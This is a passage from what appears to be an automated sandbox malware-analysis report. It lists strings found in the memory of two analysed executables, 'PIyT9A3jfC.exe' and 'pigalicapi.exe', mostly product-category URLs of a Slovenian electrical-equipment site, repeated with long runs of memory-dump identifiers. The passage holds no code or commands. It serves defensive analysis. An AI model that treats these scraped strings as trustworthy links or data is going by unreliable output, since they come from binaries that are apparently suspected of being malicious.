00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracijski-instrumenti-in-oprema/kovcki-za-merilno-opremo
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/krmilne-elektro-omarice/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/alarmne-in-napajalne-enote/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/dodatna-oprema-inor/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/izolatorji-signalov-in-izolacijski-
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/temperaturni-merilni-pretvorniki/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/terenska-ohisja-in-prikazovalniki/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/kapa
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/kond
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/plav
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-vlage/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-vlage/filmski-
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-vlage/regulato
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/koncna-in-magnetna-stikal
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/prikazovalnik-toka-jola/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/meritev
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/nivojsk
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 